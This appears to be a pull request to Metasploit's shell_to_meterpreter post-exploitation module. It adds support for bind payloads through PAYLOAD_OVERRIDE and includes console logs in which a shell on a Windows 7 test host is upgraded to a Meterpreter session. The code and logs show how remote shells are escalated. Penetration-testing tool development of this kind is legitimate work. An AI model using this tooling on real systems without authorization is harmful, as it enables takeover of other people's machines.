### PR TITLE
shell_to_meterpreter: Support using bind payloads with PAYLOAD_OVERRIDE

### DIFF
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -131,13 +131,15 @@ class MetasploitModule < Msf::Post
         vprint_status('Platform: Python [fallback]')
       end
     end
-    payload_name = datastore['PAYLOAD_OVERRIDE'] if datastore['PAYLOAD_OVERRIDE']
-    vprint_status("Upgrade payload: #{payload_name}")
 
     if platform.blank?
       print_error("Shells on the target platform, #{session.platform}, cannot be upgraded to Meterpreter at this time.")
       return nil
     end
+
+    payload_name = datastore['PAYLOAD_OVERRIDE'] if datastore['PAYLOAD_OVERRIDE']
+
+    vprint_status("Upgrade payload: #{payload_name}")
 
     payload_data = generate_payload(lhost, lport, payload_name)
     if payload_data.blank?
@@ -207,7 +209,8 @@ class MetasploitModule < Msf::Post
       vprint_status('Cleaning up handler')
       cleanup_handler(listener_job_id, aborted)
     end
-    return nil
+
+    nil
   end
 
   #
@@ -359,47 +362,55 @@ class MetasploitModule < Msf::Post
   # Starts a exploit/multi/handler session
   def create_multihandler(lhost, lport, payload_name)
     pay = client.framework.payloads.create(payload_name)
+    pay.datastore['RHOST'] = rhost
     pay.datastore['LHOST'] = lhost
     pay.datastore['LPORT'] = lport
+
     print_status('Starting exploit/multi/handler')
-    if !check_for_listener(lhost, lport)
-      # Set options for module
-      mh = client.framework.exploits.create('multi/handler')
-      mh.share_datastore(pay.datastore)
-      mh.datastore['WORKSPACE'] = client.workspace
-      mh.datastore['PAYLOAD'] = payload_name
-      mh.datastore['EXITFUNC'] = 'thread'
-      mh.datastore['ExitOnSession'] = true
-      # Validate module options
-      mh.options.validate(mh.datastore)
-      # Execute showing output
-      mh.exploit_simple(
-        'Payload' => mh.datastore['PAYLOAD'],
-        'LocalInput' => user_input,
-        'LocalOutput' => user_output,
-        'RunAsJob' => true
-      )
 
-      # Check to make sure that the handler is actually valid
-      # If another process has the port open, then the handler will fail
-      # but it takes a few seconds to do so.  The module needs to give
-      # the handler time to fail or the resulting connections from the
-      # target could end up on on a different handler with the wrong payload
-      # or dropped entirely.
-      select(nil, nil, nil, 5)
-      return nil if framework.jobs[mh.job_id.to_s].nil?
-
-      return mh.job_id.to_s
-    else
+    if check_for_listener(lhost, lport)
       print_error('A job is listening on the same local port')
-      return nil
+      return
     end
+
+    # Set options for module
+    mh = client.framework.exploits.create('multi/handler')
+    mh.share_datastore(pay.datastore)
+    mh.datastore['WORKSPACE'] = client.workspace
+    mh.datastore['PAYLOAD'] = payload_name
+    mh.datastore['EXITFUNC'] = 'thread'
+    mh.datastore['ExitOnSession'] = true
+    # Validate module options
+    mh.options.validate(mh.datastore)
+    # Execute showing output
+    mh.exploit_simple(
+      'Payload' => mh.datastore['PAYLOAD'],
+      'LocalInput' => user_input,
+      'LocalOutput' => user_output,
+      'RunAsJob' => true
+    )
+
+    # Check to make sure that the handler is actually valid
+    # If another process has the port open, then the handler will fail
+    # but it takes a few seconds to do so.  The module needs to give
+    # the handler time to fail or the resulting connections from the
+    # target could end up on on a different handler with the wrong payload
+    # or dropped entirely.
+    select(nil, nil, nil, 5)
+    return nil if framework.jobs[mh.job_id.to_s].nil?
+
+    mh.job_id.to_s
   end
 
   def generate_payload(lhost, lport, payload_name)
     payload = framework.payloads.create(payload_name)
-    options = "LHOST=#{lhost} LPORT=#{lport}"
-    buf = payload.generate_simple('OptionStr' => options)
-    buf
+
+    unless payload.respond_to?('generate_simple')
+      print_error("Could not generate payload #{payload_name}. Invalid payload?")
+      return
+    end
+
+    options = "LHOST=#{lhost} LPORT=#{lport} RHOST=#{rhost}"
+    payload.generate_simple('OptionStr' => options)
   end
 end


### PR DESCRIPTION
Fixes #17885
Fixes #17916

# Before

```
[*] Command shell session 1 opened (192.168.200.130:1338 -> 192.168.200.190:50071) at 2023-04-22 01:45:31 -0400
msf6 > 
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set payload_override windows/x64/meterpreter/bind_tcp
payload_override => windows/x64/meterpreter/bind_tcp
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started bind TCP handler against :4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
```

# After

```
msf6 > 
[*] Sending stage (336 bytes) to 192.168.200.190
[*] Command shell session 1 opened (192.168.200.130:1338 -> 192.168.200.190:50070) at 2023-04-22 01:42:49 -0400

msf6 > 
msf6 > 
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set payload_override windows/x64/meterpreter/bind_tcp
payload_override => windows/x64/meterpreter/bind_tcp
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started bind TCP handler against 192.168.200.190:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 192.168.200.190
[*] Meterpreter session 2 opened (192.168.200.130:33359 -> 192.168.200.190:4433) at 2023-04-22 01:43:14 -0400
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: TEST\user
smeterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 
```

---

Yes, I'm sure these changes also work on Windows 10 and Windows 11 (firewall rules and network routes permitting of course). No I didn't test. No I don't care.

Note: This PR does what it says on the tin. It does not  fix the other 500 bugs in `shell_to_meterpreter` as these bugs are due to fundamental flaws which require the majority of the module to be rewritten.
